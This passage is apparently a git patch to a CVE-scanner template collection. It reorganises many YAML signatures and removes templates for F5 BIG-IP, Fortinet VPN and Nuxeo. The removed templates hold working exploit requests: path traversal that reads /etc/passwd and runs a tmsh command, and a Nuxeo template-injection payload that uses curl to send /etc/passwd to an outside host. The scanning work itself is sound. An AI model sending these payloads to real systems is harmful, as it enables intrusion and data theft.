From d68946343cea066538a73b57caf8f6d07e680709 Mon Sep 17 00:00:00 2001 From: BEAST GLATISANT <26509147+g147@users.noreply.github.com> Date: Mon, 9 Nov 2020 10:01:13 +0530 Subject: [PATCH] added & organized cve signatures --- {cves => common}/aircontrol-rce.yaml | 0 common/bigip-cve-2020-5902.yaml | 35 ------------- common/fortigate-path-traversal.yaml | 21 -------- {cves => common}/joomla-lfi-comfabrik.yaml | 0 {cves => common}/joomla-sqli-hdwplayer.yaml | 0 common/nuxeo-ssti-rce.yaml | 34 ------------- cves/apache-ofbiz-xss-cve-2020-9496.yaml | 24 +++++++++ cves/apache-struts-rce-cve-2013-2251.yaml | 31 ++++++++++++ cves/apache-struts-rce-cve-2017-5638.yaml | 24 +++++++++ ...omcat-jkstatus-exposed-cve-2018-11759.yaml | 23 +++++++++ ...-tomcat-open-redirect-cve-2018-11784.yaml} | 8 +-- ... => apache-tomcat-put-cve-2017-12615.yaml} | 7 ++- cves/apache-tomcat-rce-cve-2020-9484.yaml | 21 ++++++++ .../artica-web-proxy-sqli-cve-2020-17506.yaml | 20 ++++++++ ...-improper-authorization-cve-2019-9733.yaml | 34 +++++++++++++ ...nfluence-path-traversal-cve-2019-3396.yaml | 24 +++++++++ ...tlassian-confluence-xss-cve-2018-5230.yaml | 22 +++++++++ cves/atlassian-rce-cve-2019-11580.yaml | 22 +++++++++ ...isco-asa-path-traversal-cve-2018-0296.yaml | 22 +++++++++ ...isco-asa-path-traversal-cve-2020-3187.yaml | 23 +++++++++ ...sco-asa-path-traversal-cve-2020-3452.yaml} | 5 +- cves/cisco-dos-cve-2020-16139.yaml | 23 +++++++++ ...-rv-320-326-config-leak-cve-2019-1653.yaml | 22 +++++++++ ...yaml => citrix-adc-lfi-cve-2020-8193.yaml} | 3 +- ...ix-adc-path-traversal-cve-2019-19781.yaml} | 34 ++++++++----- cves/citrix-code-injection-cve-2020-8194.yaml | 23 +++++++++ cves/citrix-lfi.yaml | 19 ------- ... citrix-path-traversal-cve-2020-7473.yaml} | 18 +++++-- cves/citrix-reflected-xss-cve-2020-8191.yaml | 23 +++++++++ cves/citrix-sharefile-exposed.yaml | 21 -------- ...harefile-path-traversal-cve-2020-8982.yaml | 21 ++++++++ cves/comodo-utmc-rce-cve-2018-17431.yaml | 30 ++++++++++++ ...aconomy-path-traversal-cve-2019-12314.yaml | 22 +++++++++ cves/emerge-rce-cve-2019-7256.yaml | 29 +++++++++++ ...qvision-web-service-rce-cve-2020-9047.yaml | 22 +++++++++ cves/f5-bigip-rce-cve-2020-5902.yaml | 31 ++++++++++++ ...vpn-path-traversal-xss-cve-2018-13379.yaml | 16 ++++-- cves/fuelcms-rce-cve-2018-16763.yaml | 22 +++++++++ cves/glpi-open-redirect-cve-2020-11034.yaml | 24 +++++++++ ...improper-authorization-cve-2019-15043.yaml | 26 ++++++++++ cves/grafana-dos-cve-2020-13379.yaml | 21 ++++++++ ... graphql-playround-xss-cve-2020-4038.yaml} | 5 +- ...missing-authorization-cve-2019-16097.yaml} | 7 ++- cves/icewarp-lfi-cve-2019-12593.yaml | 30 ++++++++++++ cves/icewarp-webmail-xss-cve-2020-8512.yaml | 21 ++++++++ ...imind-server-info-leak-cve-2020-24765.yaml | 20 ++++++++ ...improper-authentication-cve-2020-8772.yaml | 22 +++++++++ ...oss-seam-code-execution-cve-2010-1871.yaml | 23 +++++++++ cves/jenkins-audit-xss.yaml | 25 ---------- cves/jenkins-gitlab-xss-cve-2020-2096.yaml | 22 +++++++++ cves/jenkins-gitlab-xss.yaml | 33 ------------- cves/jenkins-xss-cve-2019-10475.yaml | 38 ++++++++++++++ cves/jenkins-xss-cve-2020-2140.yaml | 23 +++++++++ ...ss.yaml => jenkins-xss-cve-2020-2199.yaml} | 9 ++-- cves/jenkins-xss.yaml | 28 ----------- ...-improper-authorization-cve-2019-8446.yaml | 32 ++++++++++++ cves/jira-info-leak-cve-2019-8449.yaml | 22 +++++++++ cves/jira-info-leak-cve-2020-14179.yaml | 24 +++++++++ cves/jira-lfi.yaml | 31 ------------ cves/jira-path-traversal-cve-2019-8442.yaml | 23 +++++++++ cves/jira-ssrf-cve-2017-9506.yaml | 22 +++++++++ cves/jira-ssrf-cve-2019-8451.yaml | 23 +++++++++ cves/jira-ssrf.yaml | 31 ------------ cves/jira-ssti-cve-2019-11581.yaml | 22 +++++++++ .../jira-user-enumeration-cve-2020-14181.yaml | 23 +++++++++ cves/jira-xss-cve-2018-20824.yaml | 22 +++++++++ cves/jira-xss-cve-2020-9344.yaml | 49 +++++++++++++++++++ cves/jolokia-xss-cve-2018-1000129.yaml | 23 +++++++++ ...timelion-code-execution-cve-2019-7609.yaml | 24 +++++++++ ...improper-authorization-cve-2020-11710.yaml | 23 +++++++++ cves/kong-cve-2020-11710 copy.yaml | 26 ---------- cves/kong-cve-2020-11710.yaml | 26 ---------- .../kubelet-pprof-exposed-cve-2019-11248.yaml | 22 +++++++++ ...mproper-authentication-cve-2018-18264.yaml | 23 +++++++++ cves/linuxki-rce-cve-2020-7209.yaml | 24 +++++++++ .../lotus-domino-info-leak-cve-2005-2428.yaml | 21 ++++++++ ...improper-authentication-cve-2020-5777.yaml | 20 ++++++++ cves/magento-magmi-xss-cve-2017-7391.yaml | 22 +++++++++ ...ara-cms-reflective-xss-cve-2020-24223.yaml | 23 +++++++++ cves/mida-eframework-rce-cve-2020-15920.yaml | 23 +++++++++ ...aml => mobileiron-rce-cve-2020-15505.yaml} | 9 ++-- cves/ms-sharepoint-rce-cve-2020-1147.yaml | 22 +++++++++ cves/ms-sharepoint-rce-cve-2020-16952.yaml | 20 ++++++++ ...sweeper-code-injection-cve-2020-13167.yaml | 25 ++++++++++ cves/nextjs-disclosure.yaml | 22 --------- cves/nextjs-path-traversal-cve-2020-5284.yaml | 24 +++++++++ ...repository-manager-rce-cve-2019-7238.yaml} | 6 +-- ...repository-manager-rce-cve-2020-10199.yaml | 25 ++++++++++ ...repository-manager-rce-cve-2020-10204.yaml | 24 +++++++++ ...remote-integer-overflow-cve-2017-7529.yaml | 23 +++++++++ .../nodejs-path-traversal-cve-2017-14849.yaml | 22 +++++++++ cves/nodejs-path-traversal-cve-2018-3714.yaml | 22 +++++++++ cves/nostromo-rce-cve-2019-16278.yaml | 23 +++++++++ cves/nuxeo-ssti-cve-2018-16341.yaml | 21 ++++++++ cves/odoo-lfi-cve-2018-15640.yaml | 31 ++++++++++++ cves/olimpoks-xss-cve-2020-16270.yaml | 23 +++++++++ cves/openfire-ssrf-cve-2019-18394.yaml | 22 +++++++++ cves/openfire-ssrf.yaml | 22 --------- ...l => openproject-sqli-cve-2019-11600.yaml} | 7 ++- cves/openschool-xss-cve-2019-14696.yaml | 22 +++++++++ ...racle-bi-path-traversal-cve-2019-2588.yaml | 22 +++++++++ ...improper-authorization-cve-2020-9315.yaml} | 8 ++- cves/oracle-sgd-xss-cve-2018-19439.yaml | 22 +++++++++ cves/oracle-webcenter-xss-cve-2017-10075.yaml | 30 ++++++++++++ cves/oracle-webcenter-xss-cve-2018-2791.yaml | 22 +++++++++ ...c-console-auth-bypass-cve-2020-14750.yaml} | 4 +- ...onsole-rce-cve-2020\342\200\22314882.yaml" | 0 ...-rce-probe-cve-2020\342\200\22314882.yaml" | 2 +- cves/oracle-weblogic-rce-cve-2019-2725.yaml | 30 ++++++++++++ cves/oracle-weblogic-rce-cve-2020-14882.yaml | 37 ++++++++++++++ cves/oracle-weblogic-rce-cve-2020-2551.yaml | 23 +++++++++ ...erkzeug-path-traversal-cve-2019-14322.yaml | 24 +++++++++ cves/php-rce-cve-2019-11043.yaml | 20 ++++++++ ...-rce.yaml => php7-rce-cve-2019-11043.yaml} | 2 +- cves/phpmychat-xss-cve-2019-19908.yaml | 22 +++++++++ .../phpunit-code-injection-cve-2017-9841.yaml | 33 +++++++++++++ ...connect-path-traversal-cve-2019-11510.yaml | 22 +++++++++ cves/pulse-vpn-lfi.yaml | 16 ------ .../qdpm-authenticated-rce-cve-2020-7246.yaml | 25 ++++++++++ cves/qnap-ps-rce-cve-2019-7192.yaml | 22 +++++++++ cves/qnap-qts-rce-cve-2017-6360.yaml | 22 +++++++++ cves/qnap-qts-rce-cve-2017-6361.yaml | 22 +++++++++ cves/rails-cve-2018-3760.yaml | 26 ---------- cves/rails-cve-2019-5418.yaml | 28 ----------- cves/rails-info-leak-cve-2019-5418.yaml | 35 +++++++++++++ cves/rails-rce-cve-2020-8163.yaml | 21 ++++++++ ...ils-sprockets-info-leak-cve-2018-3760.yaml | 33 +++++++++++++ cves/rconfig-rce-cve-2019-16662.yaml | 22 +++++++++ cves/rconfig-sqli-cve-2020-10220.yaml | 23 +++++++++ ...onsive-filemanager-lfi-cve-2018-14728.yaml | 24 +++++++++ cves/revive-adserver-xss-cve-2020-8115.yaml | 24 +++++++++ cves/rsa-xss-cve-2018-1247.yaml | 22 +++++++++ cves/rumpus-ftp-xss-cve-2019-19368.yaml | 20 ++++++++ ...improper-authentication-cve-2020-6287.yaml | 11 ++--- ...avsoft-quiz-stored-xss-cve-2020-24609.yaml | 23 +++++++++ cves/seomatic-ssti-cve-2020-9757.yaml | 24 +++++++++ cves/solarwinds-xss-cve-2018-19386.yaml | 22 +++++++++ ...-rce.yaml => solr-rce-cve-2019-17558.yaml} | 18 +++---- cves/sophos-xg-sqli-cve-2020-12271.yaml | 23 +++++++++ cves/splunk-info-leak-cve-2018-11409.yaml | 23 +++++++++ cves/splunk-license.yaml | 18 ------- ...ng-cloud-path-traversal-cve-2019-3799.yaml | 22 +++++++++ ...ng-cloud-path-traversal-cve-2020-5405.yaml | 33 +++++++++++++ ...ng-cloud-path-traversal-cve-2020-5410.yaml | 21 ++++++++ cves/spring-cloud-ssrf-cve-2020-5412.yaml | 24 +++++++++ cves/spring-cve-2020-5405.yaml | 29 ----------- ...spring-data-commons-rce-cve-2018-1273.yaml | 33 +++++++++++++ cves/spring-lfi.yaml | 27 ---------- ...ring-mvc-path-traversal-cve-2018-1271.yaml | 23 +++++++++ cves/spring-mvc-rfd-cve-2020-5398.yaml | 20 ++++++++ ...be.yaml => sql-srs-rce-cve-2020-0618.yaml} | 11 ++--- cves/subrion-cms-sqli-cve-2017-11444.yaml | 22 +++++++++ cves/sugarcrm-xss-cve-2019-14974.yaml | 22 +++++++++ cves/tableau-dom-xss-cve-2019-19719.yaml | 22 +++++++++ ...nkadmin-path-traversal-cve-2020-25540.yaml | 23 +++++++++ cves/thinkphp-rce-cve-2018-20062.yaml | 22 +++++++++ cves/thinkphp-rce-cve-2019-9082.yaml | 24 +++++++++ cves/timesheet-xss-cve-2019-1010287.yaml | 23 +++++++++ cves/tomcat-jkstatus.yaml | 22 --------- .../totaljs-path-traversal-cve-2019-8903.yaml | 20 ++++++++ .../traefik-open-redirect-cve-2020-15129.yaml | 22 +++++++++ ...trixbox-path-traversal-cve-2017-14537.yaml | 32 ++++++++++++ cves/typo3-xss-cve-2020-8091.yaml | 24 +++++++++ cves/uwsgi-path-traversal-cve-2018-7490.yaml | 20 ++++++++ cves/vbulletin-rce-cve-2019-16759.yaml | 40 +++++++++++++++ ...aml => vbulletin-sqli-cve-2020-12720.yaml} | 11 ++--- cves/vcenter-lfi-cve-2020-3952.yaml | 29 +++++++++++ cves/wavemaker-studio-lfi-cve-2019-8982.yaml | 22 +++++++++ cves/webmin-rce-cve-2019-15107.yaml | 24 +++++++++ .../webport-reflected-xss-cve-2019-12461.yaml | 22 +++++++++ .../wordpress-backup-leak-cve-2020-24312.yaml | 23 +++++++++ cves/wordpress-db-reset-cve-2020-7048.yaml | 20 ++++++++ cves/wordpress-dos-cve-2018-6389.yaml | 23 +++++++++ .../wordpress-file-upload-cve-2020-25213.yaml | 20 ++++++++ ...improper-authorization-cve-2019-19985.yaml | 22 +++++++++ ...yaml => wordpress-lfi-cve-2019-14205.yaml} | 6 +-- ...ordpress-reflected-xss-cve-2019-20141.yaml | 23 +++++++++ cves/wordpress-rfi-cve-2019-6715.yaml | 24 +++++++++ cves/wordpress-rfi-cve-2019-9978.yaml | 23 +++++++++ cves/wordpress-sqli-cve-2020-11530.yaml | 23 +++++++++ cves/wordpress-stored-xss-cve-2018-18069.yaml | 24 +++++++++ cves/wordpress-xss-cve-2019-6112.yaml | 22 +++++++++ ...mproper-authentication-cve-2019-17382.yaml | 22 +++++++++ ...xxe.yaml => zimbra-rce-cve-2019-9670.yaml} | 14 +++--- cves/zoho-path-traversal-cve-2020-12116.yaml | 23 +++++++++ cves/zyxel-nas-rce-cve-2020-9054.yaml | 21 ++++++++ 186 files changed, 3438 insertions(+), 649 deletions(-) rename {cves => common}/aircontrol-rce.yaml (100%) delete mode 100644 common/bigip-cve-2020-5902.yaml delete mode 100644 common/fortigate-path-traversal.yaml rename {cves => common}/joomla-lfi-comfabrik.yaml (100%) rename {cves => common}/joomla-sqli-hdwplayer.yaml (100%) delete mode 100644 common/nuxeo-ssti-rce.yaml create mode 100644 cves/apache-ofbiz-xss-cve-2020-9496.yaml create mode 100644 cves/apache-struts-rce-cve-2013-2251.yaml create mode 100644 cves/apache-struts-rce-cve-2017-5638.yaml create mode 100644 cves/apache-tomcat-jkstatus-exposed-cve-2018-11759.yaml rename cves/{tomcat-open-redirect.yaml => apache-tomcat-open-redirect-cve-2018-11784.yaml} (63%) rename cves/{tomcat-put-method.yaml => apache-tomcat-put-cve-2017-12615.yaml} (81%) create mode 100644 cves/apache-tomcat-rce-cve-2020-9484.yaml create mode 100644 cves/artica-web-proxy-sqli-cve-2020-17506.yaml create mode 100644 cves/artifactory-improper-authorization-cve-2019-9733.yaml create mode 100644 cves/atlassian-confluence-path-traversal-cve-2019-3396.yaml create mode 100644 cves/atlassian-confluence-xss-cve-2018-5230.yaml create mode 100644 cves/atlassian-rce-cve-2019-11580.yaml create mode 100644 cves/cisco-asa-path-traversal-cve-2018-0296.yaml create mode 100644 cves/cisco-asa-path-traversal-cve-2020-3187.yaml rename cves/{cisco-asa-lfi.yaml => cisco-asa-path-traversal-cve-2020-3452.yaml} (91%) create mode 100644 cves/cisco-dos-cve-2020-16139.yaml create mode 100644 cves/cisco-rv-320-326-config-leak-cve-2019-1653.yaml rename cves/{citrix-adc-lfi.yaml => citrix-adc-lfi-cve-2020-8193.yaml} (96%) rename cves/{citrix-rce.yaml => citrix-adc-path-traversal-cve-2019-19781.yaml} (56%) create mode 100644 cves/citrix-code-injection-cve-2020-8194.yaml delete mode 100644 cves/citrix-lfi.yaml rename cves/{citrix-sharefile-lfi.yaml => citrix-path-traversal-cve-2020-7473.yaml} (52%) create mode 100644 cves/citrix-reflected-xss-cve-2020-8191.yaml delete mode 100644 cves/citrix-sharefile-exposed.yaml create mode 100644 cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml create mode 100644 cves/comodo-utmc-rce-cve-2018-17431.yaml create mode 100644 cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml create mode 100644 cves/emerge-rce-cve-2019-7256.yaml create mode 100644 cves/exacqvision-web-service-rce-cve-2020-9047.yaml create mode 100644 cves/f5-bigip-rce-cve-2020-5902.yaml rename common/fortigate-xss.yaml => cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml (61%) create mode 100644 cves/fuelcms-rce-cve-2018-16763.yaml create mode 100644 cves/glpi-open-redirect-cve-2020-11034.yaml create mode 100644 cves/grafana-api-improper-authorization-cve-2019-15043.yaml create mode 100644 cves/grafana-dos-cve-2020-13379.yaml rename cves/{graphql-playround-xss.yaml => graphql-playround-xss-cve-2020-4038.yaml} (89%) rename cves/{harboar-cve-2019-16097.yaml => harbor-missing-authorization-cve-2019-16097.yaml} (75%) create mode 100644 cves/icewarp-lfi-cve-2019-12593.yaml create mode 100644 cves/icewarp-webmail-xss-cve-2020-8512.yaml create mode 100644 cves/imind-server-info-leak-cve-2020-24765.yaml create mode 100644 cves/infinitewp-improper-authentication-cve-2020-8772.yaml create mode 100644 cves/jboss-seam-code-execution-cve-2010-1871.yaml delete mode 100644 cves/jenkins-audit-xss.yaml create mode 100644 cves/jenkins-gitlab-xss-cve-2020-2096.yaml delete mode 100644 cves/jenkins-gitlab-xss.yaml create mode 100644 cves/jenkins-xss-cve-2019-10475.yaml create mode 100644 cves/jenkins-xss-cve-2020-2140.yaml rename cves/{jenkins-subversion-xss.yaml => jenkins-xss-cve-2020-2199.yaml} (64%) delete mode 100644 cves/jenkins-xss.yaml create mode 100644 cves/jira-improper-authorization-cve-2019-8446.yaml create mode 100644 cves/jira-info-leak-cve-2019-8449.yaml create mode 100644 cves/jira-info-leak-cve-2020-14179.yaml delete mode 100644 cves/jira-lfi.yaml create mode 100644 cves/jira-path-traversal-cve-2019-8442.yaml create mode 100644 cves/jira-ssrf-cve-2017-9506.yaml create mode 100644 cves/jira-ssrf-cve-2019-8451.yaml delete mode 100644 cves/jira-ssrf.yaml create mode 100644 cves/jira-ssti-cve-2019-11581.yaml create mode 100644 cves/jira-user-enumeration-cve-2020-14181.yaml create mode 100644 cves/jira-xss-cve-2018-20824.yaml create mode 100644 cves/jira-xss-cve-2020-9344.yaml create mode 100644 cves/jolokia-xss-cve-2018-1000129.yaml create mode 100644 cves/kibana-timelion-code-execution-cve-2019-7609.yaml create mode 100644 cves/kong-api-improper-authorization-cve-2020-11710.yaml delete mode 100644 cves/kong-cve-2020-11710 copy.yaml delete mode 100644 cves/kong-cve-2020-11710.yaml create mode 100644 cves/kubelet-pprof-exposed-cve-2019-11248.yaml create mode 100644 cves/kubernetes-improper-authentication-cve-2018-18264.yaml create mode 100644 cves/linuxki-rce-cve-2020-7209.yaml create mode 100644 cves/lotus-domino-info-leak-cve-2005-2428.yaml create mode 100644 cves/magento-magmi-improper-authentication-cve-2020-5777.yaml create mode 100644 cves/magento-magmi-xss-cve-2017-7391.yaml create mode 100644 cves/mara-cms-reflective-xss-cve-2020-24223.yaml create mode 100644 cves/mida-eframework-rce-cve-2020-15920.yaml rename cves/{mobileiron-rce-probe.yaml => mobileiron-rce-cve-2020-15505.yaml} (71%) create mode 100644 cves/ms-sharepoint-rce-cve-2020-1147.yaml create mode 100644 cves/ms-sharepoint-rce-cve-2020-16952.yaml create mode 100644 cves/netsweeper-code-injection-cve-2020-13167.yaml delete mode 100644 cves/nextjs-disclosure.yaml create mode 100644 cves/nextjs-path-traversal-cve-2020-5284.yaml rename cves/{nexus-cve-2019-7238.yaml => nexus-repository-manager-rce-cve-2019-7238.yaml} (98%) create mode 100644 cves/nexus-repository-manager-rce-cve-2020-10199.yaml create mode 100644 cves/nexus-repository-manager-rce-cve-2020-10204.yaml create mode 100644 cves/nginx-remote-integer-overflow-cve-2017-7529.yaml create mode 100644 cves/nodejs-path-traversal-cve-2017-14849.yaml create mode 100644 cves/nodejs-path-traversal-cve-2018-3714.yaml create mode 100644 cves/nostromo-rce-cve-2019-16278.yaml create mode 100644 cves/nuxeo-ssti-cve-2018-16341.yaml create mode 100644 cves/odoo-lfi-cve-2018-15640.yaml create mode 100644 cves/olimpoks-xss-cve-2020-16270.yaml create mode 100644 cves/openfire-ssrf-cve-2019-18394.yaml delete mode 100644 cves/openfire-ssrf.yaml rename cves/{openproject-sqli.yaml => openproject-sqli-cve-2019-11600.yaml} (81%) create mode 100644 cves/openschool-xss-cve-2019-14696.yaml create mode 100644 cves/oracle-bi-path-traversal-cve-2019-2588.yaml rename cves/{iplanet-disclosure.yaml => oracle-iplanet-improper-authorization-cve-2020-9315.yaml} (78%) create mode 100644 cves/oracle-sgd-xss-cve-2018-19439.yaml create mode 100644 cves/oracle-webcenter-xss-cve-2017-10075.yaml create mode 100644 cves/oracle-webcenter-xss-cve-2018-2791.yaml rename cves/{weblogic-console-auth-bypass.yaml => oracle-weblogic-console-auth-bypass-cve-2020-14750.yaml} (83%) rename cves/weblogic-console-rce.yaml => "cves/oracle-weblogic-console-rce-cve-2020\342\200\22314882.yaml" (100%) rename cves/weblogic-console-rce-probe.yaml => "cves/oracle-weblogic-console-rce-probe-cve-2020\342\200\22314882.yaml" (95%) create mode 100644 cves/oracle-weblogic-rce-cve-2019-2725.yaml create mode 100644 cves/oracle-weblogic-rce-cve-2020-14882.yaml create mode 100644 cves/oracle-weblogic-rce-cve-2020-2551.yaml create mode 100644 cves/pallets-werkzeug-path-traversal-cve-2019-14322.yaml create mode 100644 cves/php-rce-cve-2019-11043.yaml rename cves/{php7-rce.yaml => php7-rce-cve-2019-11043.yaml} (96%) create mode 100644 cves/phpmychat-xss-cve-2019-19908.yaml create mode 100644 cves/phpunit-code-injection-cve-2017-9841.yaml create mode 100644 cves/pulse-connect-path-traversal-cve-2019-11510.yaml delete mode 100644 cves/pulse-vpn-lfi.yaml create mode 100644 cves/qdpm-authenticated-rce-cve-2020-7246.yaml create mode 100644 cves/qnap-ps-rce-cve-2019-7192.yaml create mode 100644 cves/qnap-qts-rce-cve-2017-6360.yaml create mode 100644 cves/qnap-qts-rce-cve-2017-6361.yaml delete mode 100644 cves/rails-cve-2018-3760.yaml delete mode 100644 cves/rails-cve-2019-5418.yaml create mode 100644 cves/rails-info-leak-cve-2019-5418.yaml create mode 100644 cves/rails-rce-cve-2020-8163.yaml create mode 100644 cves/rails-sprockets-info-leak-cve-2018-3760.yaml create mode 100644 cves/rconfig-rce-cve-2019-16662.yaml create mode 100644 cves/rconfig-sqli-cve-2020-10220.yaml create mode 100644 cves/responsive-filemanager-lfi-cve-2018-14728.yaml create mode 100644 cves/revive-adserver-xss-cve-2020-8115.yaml create mode 100644 cves/rsa-xss-cve-2018-1247.yaml create mode 100644 cves/rumpus-ftp-xss-cve-2019-19368.yaml rename common/sap-netweaver-create-admin-user.yaml => cves/sap-netweaver-improper-authentication-cve-2020-6287.yaml (93%) create mode 100644 cves/savsoft-quiz-stored-xss-cve-2020-24609.yaml create mode 100644 cves/seomatic-ssti-cve-2020-9757.yaml create mode 100644 cves/solarwinds-xss-cve-2018-19386.yaml rename cves/{solr-rce.yaml => solr-rce-cve-2019-17558.yaml} (59%) create mode 100644 cves/sophos-xg-sqli-cve-2020-12271.yaml create mode 100644 cves/splunk-info-leak-cve-2018-11409.yaml delete mode 100644 cves/splunk-license.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2019-3799.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2020-5405.yaml create mode 100644 cves/spring-cloud-path-traversal-cve-2020-5410.yaml create mode 100644 cves/spring-cloud-ssrf-cve-2020-5412.yaml delete mode 100644 cves/spring-cve-2020-5405.yaml create mode 100644 cves/spring-data-commons-rce-cve-2018-1273.yaml delete mode 100644 cves/spring-lfi.yaml create mode 100644 cves/spring-mvc-path-traversal-cve-2018-1271.yaml create mode 100644 cves/spring-mvc-rfd-cve-2020-5398.yaml rename cves/{sql-report-server-probe.yaml => sql-srs-rce-cve-2020-0618.yaml} (62%) create mode 100644 cves/subrion-cms-sqli-cve-2017-11444.yaml create mode 100644 cves/sugarcrm-xss-cve-2019-14974.yaml create mode 100644 cves/tableau-dom-xss-cve-2019-19719.yaml create mode 100644 cves/thinkadmin-path-traversal-cve-2020-25540.yaml create mode 100644 cves/thinkphp-rce-cve-2018-20062.yaml create mode 100644 cves/thinkphp-rce-cve-2019-9082.yaml create mode 100644 cves/timesheet-xss-cve-2019-1010287.yaml delete mode 100644 cves/tomcat-jkstatus.yaml create mode 100644 cves/totaljs-path-traversal-cve-2019-8903.yaml create mode 100644 cves/traefik-open-redirect-cve-2020-15129.yaml create mode 100644 cves/trixbox-path-traversal-cve-2017-14537.yaml create mode 100644 cves/typo3-xss-cve-2020-8091.yaml create mode 100644 cves/uwsgi-path-traversal-cve-2018-7490.yaml create mode 100644 cves/vbulletin-rce-cve-2019-16759.yaml rename cves/{vbulletin-sqli.yaml => vbulletin-sqli-cve-2020-12720.yaml} (92%) create mode 100644 cves/vcenter-lfi-cve-2020-3952.yaml create mode 100644 cves/wavemaker-studio-lfi-cve-2019-8982.yaml create mode 100644 cves/webmin-rce-cve-2019-15107.yaml create mode 100644 cves/webport-reflected-xss-cve-2019-12461.yaml create mode 100644 cves/wordpress-backup-leak-cve-2020-24312.yaml create mode 100644 cves/wordpress-db-reset-cve-2020-7048.yaml create mode 100644 cves/wordpress-dos-cve-2018-6389.yaml create mode 100644 cves/wordpress-file-upload-cve-2020-25213.yaml create mode 100644 cves/wordpress-improper-authorization-cve-2019-19985.yaml rename cves/{wordpress-lfi.yaml => wordpress-lfi-cve-2019-14205.yaml} (91%) create mode 100644 cves/wordpress-reflected-xss-cve-2019-20141.yaml create mode 100644 cves/wordpress-rfi-cve-2019-6715.yaml create mode 100644 cves/wordpress-rfi-cve-2019-9978.yaml create mode 100644 cves/wordpress-sqli-cve-2020-11530.yaml create mode 100644 cves/wordpress-stored-xss-cve-2018-18069.yaml create mode 100644 cves/wordpress-xss-cve-2019-6112.yaml create mode 100644 cves/zabbix-improper-authentication-cve-2019-17382.yaml rename cves/{zimbra-xxe.yaml => zimbra-rce-cve-2019-9670.yaml} (76%) create mode 100644 cves/zoho-path-traversal-cve-2020-12116.yaml create mode 100644 cves/zyxel-nas-rce-cve-2020-9054.yaml diff --git a/cves/aircontrol-rce.yaml b/common/aircontrol-rce.yaml similarity index 100% rename from cves/aircontrol-rce.yaml rename to common/aircontrol-rce.yaml diff --git a/common/bigip-cve-2020-5902.yaml b/common/bigip-cve-2020-5902.yaml deleted file mode 100644 index 170047b..0000000 --- a/common/bigip-cve-2020-5902.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: bigip-rce-cve-2020-5902 -info: - name: BigIP F5 RCE CVE-2020-5902 - risk: High - confidence: Certain - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch('body', 'output"') && StringSearch('body', '{"error"') - - # other interesting files - # /config/bigip.license, /config/bigip.conf - - method: GET - redirect: false - url: >- - {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch('body', 'root:x') && StringSearch('body', 'bin:') - -references: - - link: https://support.f5.com/csp/article/K52145254 - - rce_root: https://github.com/rapid7/metasploit-framework/blob/41bb4d3a8d64ac7cb829539205991b80b6f77686/modules/exploits/linux/http/f5_bigip_tmui_rce.rb \ No newline at end of file diff --git a/common/fortigate-path-traversal.yaml b/common/fortigate-path-traversal.yaml deleted file mode 100644 index e9dab51..0000000 --- a/common/fortigate-path-traversal.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: fortigate-path-traversal -info: - name: Fortinet VPN Path Traversal - CVE-2018-13379 - risk: High - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("resHeaders", "application/javascript") && StringSearch("body", "fgt_lang") - -references: - - link: https://www.exploit-db.com/exploits/47287 diff --git a/cves/joomla-lfi-comfabrik.yaml b/common/joomla-lfi-comfabrik.yaml similarity index 100% rename from cves/joomla-lfi-comfabrik.yaml rename to common/joomla-lfi-comfabrik.yaml diff --git a/cves/joomla-sqli-hdwplayer.yaml b/common/joomla-sqli-hdwplayer.yaml similarity index 100% rename from cves/joomla-sqli-hdwplayer.yaml rename to common/joomla-sqli-hdwplayer.yaml diff --git a/common/nuxeo-ssti-rce.yaml b/common/nuxeo-ssti-rce.yaml deleted file mode 100644 index 30d8eac..0000000 --- a/common/nuxeo-ssti-rce.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: nuxeo-ssti-rce -info: - name: Nuxeo SSTI RCE - CVE-2018-16341 - risk: Critical - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/nuxeo/login.jsp/pwn${1199128+7}.xhtml - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "facelet") && StringSearch("response", "1199135") - -references: - - link: https://github.com/mpgn/CVE-2018-16341 - - link2: https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/ - - rce: | - http://example.com/nuxeo/login.jsp/pwn${expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'pwd')))))}.xhtml - - rce2: | - GET /nuxeo/login.jsp/pwn${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl%20--data-binary%20@/etc/passwd%20xkl8uq9g5c7qnblke1tg153ppgv8jx.burpcollaborator.net",null).waitFor()}.xhtml HTTP/1.1 - Host: target - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.3 - Accept: 